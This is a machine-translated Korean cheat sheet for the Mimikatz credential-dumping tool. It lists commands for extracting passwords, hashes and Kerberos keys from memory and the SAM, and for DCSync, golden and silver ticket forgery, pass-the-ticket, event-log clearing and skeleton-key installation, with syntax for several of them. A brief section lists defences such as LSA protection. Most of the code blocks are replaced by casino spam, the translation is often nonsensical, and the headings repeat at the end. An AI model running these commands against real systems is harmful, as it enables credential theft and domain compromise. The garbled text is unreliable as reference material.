Mimikatz 열 시트¶

제품정보¶

Mimikatz는 Benjamin Delpy (@gentilkiwi)가 개발 한 강력한 자격의 덤프 및 조작 도구입니다. 일반 텍스트 암호, 해시, PIN 코드 및 메모리에서 Kerberos 티켓을 추출 할 수 있으며 Pass-the-hash, pass-the-ticket 및 황금 티켓 생성과 같은 다양한 공격을 수행 할 수 있습니다.

· Warning: Mimikatz는 악의적으로 사용할 수있는 보안 테스트 도구입니다. 해당 이용 후기에 달린 코멘트가 없습니다.

Mimikatz 인증 획득¶

공식 저장소¶

GitHub: https://github.com/gentilkiwi/mimikatz
최신 릴리스: https://github.com/gentilkiwi/mimikatz/releases

Pre-compiled 의무¶

mimikatz.exe - 32비트 실행 가능
mimikatz_trunk.zip - 32비트와 64비트 실행 가능

편집 부터 Source¶

카지노사이트

기본 사용¶

운영 Mimikatz¶

카지노사이트

도움 받기¶

카지노사이트

Mimikatz 출구¶

카지노사이트

핵심 모듈 및 명령¶

sekurlsa 모듈 (LSASS 메모리 액세스)¶

Command	Description
`sekurlsa::logonpasswords`	Extract all logon passwords
`sekurlsa::tickets`	Extract Kerberos tickets
`sekurlsa::ekeys`	Extract Kerberos encryption keys
`sekurlsa::dpapi`	Extract DPAPI master keys
`sekurlsa::credman`	Extract credentials from Windows Credential Manager
`sekurlsa::msv`	Extract MSV authentication information
`sekurlsa::tspkg`	Extract TSPKG authentication information
`sekurlsa::wdigest`	Extract WDigest authentication information
`sekurlsa::kerberos`	Extract Kerberos authentication information
`sekurlsa::ssp`	Extract SSP authentication information
`sekurlsa::livessp`	Extract LiveSSP authentication information
`sekurlsa::cloudap`	Extract CloudAP authentication information

lsadump 모듈 (SAM 및 Active Directory)¶

Command	Description
`lsadump::sam`	Extract hashes from the SAM database
`lsadump::secrets`	Extract LSA secrets
`lsadump::cache`	Extract cached domain credentials
`lsadump::dcsync`	Perform DCSync attack to retrieve password data
`lsadump::lsa`	Extract LSA secrets
`lsadump::trust`	Extract domain trust keys
`lsadump::backupkeys`	Extract domain backup keys

kerberos 단위 (티켓 제조)¶

Command	Description
`kerberos::list`	List all Kerberos tickets
`kerberos::purge`	Purge all Kerberos tickets
`kerberos::ptt`	Pass-the-ticket (inject a ticket)
`kerberos::golden`	Create a golden ticket
`kerberos::silver`	Create a silver ticket
`kerberos::tgt`	Create a TGT
`kerberos::hash`	Calculate Kerberos keys from password

암호화 모듈 (Cryptographic Operations)¶

Command	Description
`crypto::certificates`	List certificates
`crypto::keys`	List keys
`crypto::system`	List system certificates
`crypto::capi`	List CAPI certificates
`crypto::cng`	List CNG certificates
`crypto::stores`	List certificate stores

vault 모듈 (Windows Vault 액세스)¶

Command	Description
`vault::cred`	List credentials in Windows Vault
`vault::list`	List vault credentials

토큰 모듈 (Token Manipulation)¶

Command	Description
`token::whoami`	Display current token information
`token::list`	List all tokens
`token::elevate`	Elevate token privileges
`token::revert`	Revert token
`token::run`	Run a process with a token

권한 모듈 (Privilege Management)¶

Command	Description
`privilege::debug`	Enable debug privilege
`privilege::driver`	Load a driver

이벤트 모듈 (Event Log Management)¶

Command	Description
`event::clear`	Clear event logs
`event::drop`	Drop event logs

ts 모듈(Terminal Services)¶

Command	Description
`ts::sessions`	List terminal services sessions
`ts::multirdp`	Enable multiple RDP sessions

misc 모듈 (중등)¶

Command	Description
`misc::cmd`	Command prompt
`misc::regedit`	Registry editor
`misc::taskmgr`	Task manager
`misc::ncroutemon`	Network connection route monitor
`misc::detours`	Detours detection
`misc::skeleton`	Install skeleton key

일반 공격 기술¶

공급 업체¶

추출물 Logon 암호¶

카지노사이트

SAM에서 Credentials 추출¶

카지노사이트

법적 고지¶

카지노사이트

LSASS 덤프에서 추출¶

카지노사이트

Pass-the-Hash 공격¶

NTLM을 사용한 패스-하쉬¶

카지노사이트

AES Keys를 사용한 Pass-the-Hash¶

ο 회원 관리

오버 패스 - 해시 (Kerberos에 NTLM을 변환)¶

카지노사이트

DCSync 공격¶

모든 사용자를 위한 NTLM 해시 추출¶

카지노사이트

특정 사용자를 위한 NTLM 해시 추출¶

카지노사이트

KRBTGT 용 NTLM 해시 추출 (황금 티켓 용)¶

카지노사이트

Kerberos 티켓 공격¶

Kerberos 티켓¶

카지노사이트

골든 티켓 만들기¶

카지노사이트

실버 티켓 만들기¶

카지노사이트

패스-티켓¶

카지노사이트

티켓 구매¶

오프화이트

Skeleton 키 공격¶

카지노사이트

고급 기술¶

DPAPI 마스터 키 추출¶

오프화이트

LSA 보호 우회¶

카지노사이트

원격 작업¶

카지노사이트

Windows Credential Manager에서 Credentials 추출¶

카지노사이트

도메인 백업 키 추출¶

카지노사이트

매개 변수와 명령 예제¶

sekurlsa::로그온 패스워드¶

카지노사이트

정액::pth¶

카지노사이트

lsadump::DCsync의¶

lsadump::dcsync /domain:DOMAIN /user:USERNAME [/guid:\\\\{object-guid\\\\}]
lsadump::dcsync /domain:DOMAIN /all [/csv]
```의 경우

### kerberos::금

kerberos::golden /user:USERNAME /domain:DOMAIN /sid:DOMAIN_SID /krbtgt:HASH [/id:USER_ID] [/groups:GROUP_IDS] [/ticket:OUTPUT_FILE] ```에 대하여

kerberos::ptt의¶

kerberos::ptt TICKET_FILE
```의 경우

## 방어 측정

### 검출 방법
- mimikatz.exe 또는 lsass에 접근하는 suspicious 과정의 과정을 위한 감시자. 다운로드
- 의심스러운 LSASS 메모리 액세스를 위한 모니터
- DCSync 가동을 위한 감시자 (non-DC 기계에서 신청 요구)
- 티켓 작성 및 조작을위한 모니터
- escalation을 위한 모니터

### 예방 방법
- Enable LSA 보호 (RunAsPPL)

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f

에 대하여
- 잠재적 인 가드 (Windows 10/Server 2016+)
- 보호된 구현 사용자 그룹
- WDigest 인증

reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 0 /f ```의 경우 - JEA(JEA) - 비밀번호 - 제한 관리 권한 - 강력한 비밀번호 사용

Mimikatz 열 시트¶

제품정보¶

Mimikatz 인증 획득¶

공식 저장소¶

Pre-compiled 의무¶

편집 부터 Source¶

기본 사용¶

운영 Mimikatz¶

관련 기사¶

도움 받기¶

Mimikatz 출구¶

핵심 모듈 및 명령¶

sekurlsa 모듈 (LSASS 메모리 액세스)¶

lsadump 모듈 (SAM 및 Active Directory)¶

kerberos 단위 (티켓 제조)¶

암호화 모듈 (Cryptographic Operations)¶

vault 모듈 (Windows Vault 액세스)¶

토큰 모듈 (Token Manipulation)¶

권한 모듈 (Privilege Management)¶

이벤트 모듈 (Event Log Management)¶

ts 모듈(Terminal Services)¶

misc 모듈 (중등)¶

일반 공격 기술¶

공급 업체¶

추출물 Logon 암호¶

SAM에서 Credentials 추출¶

법적 고지¶

LSASS 덤프에서 추출¶

Pass-the-Hash 공격¶

NTLM을 사용한 패스-하쉬¶

AES Keys를 사용한 Pass-the-Hash¶

오버 패스 - 해시 (Kerberos에 NTLM을 변환)¶

DCSync 공격¶

모든 사용자를 위한 NTLM 해시 추출¶

특정 사용자를 위한 NTLM 해시 추출¶

KRBTGT 용 NTLM 해시 추출 (황금 티켓 용)¶

Kerberos 티켓 공격¶

Kerberos 티켓¶

골든 티켓 만들기¶

실버 티켓 만들기¶

패스-티켓¶

티켓 구매¶

Skeleton 키 공격¶

고급 기술¶

DPAPI 마스터 키 추출¶

LSA 보호 우회¶

원격 작업¶

Windows Credential Manager에서 Credentials 추출¶

도메인 백업 키 추출¶

매개 변수와 명령 예제¶

sekurlsa::로그온 패스워드¶

정액::pth¶

lsadump::DCsync의¶

kerberos::ptt의¶

지원하다¶